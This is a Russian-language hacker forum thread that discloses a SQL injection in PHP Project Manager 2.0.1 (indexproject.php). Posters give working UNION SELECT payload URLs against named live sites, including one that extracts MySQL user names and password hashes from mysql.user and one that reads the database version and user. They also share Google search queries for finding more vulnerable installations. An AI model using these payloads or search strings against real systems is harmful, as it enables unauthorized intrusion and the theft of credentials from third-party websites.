![]() |
sql inj PHP Project Manager => 2.0.1
изначально уязвимость предполагалось для того чтобы меня взяли в моа, но т.к. меня послали - я её выкладываю.
PHP Project Manager версия => 2.0.1 описание: Уязвимость существует в сценарии indexproject.php из-за недостаточной обработки входных данных. пример: Код:
http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35/* |
хэк=)
|
Молодец, правда скрипт не популярен, не думаю что в МОА было бы комуто интересно...
:) |
и это все??? нда, коварно..
я думал ты хоть подобрал названия таблиц.. |
Цитата:
|
мде =\
Код:
http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.user/*:) |
Цитата:
|
Цитата:
я понял твою мысль.. |
ну вот и хорошо :)
следующий.. |
Цитата:
Строка для поиска в гугл: inurl:indexproject.php?id Мдя, не густо: Код:
http://www.google.ru/search?hl=ru&q=inurl%3Aindexproject.php%3Fid&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=Код:
http://www.google.ru/search?hl=ru&newwindow=1&q=%22PHP+Project+Manager+2.0.1%22&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=Код:
http://www.nuevoparadigma.com/proyectos/indexproject.php?id=-1+union+select+1,version(),3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*Цитата:
|
| Время: 04:19 |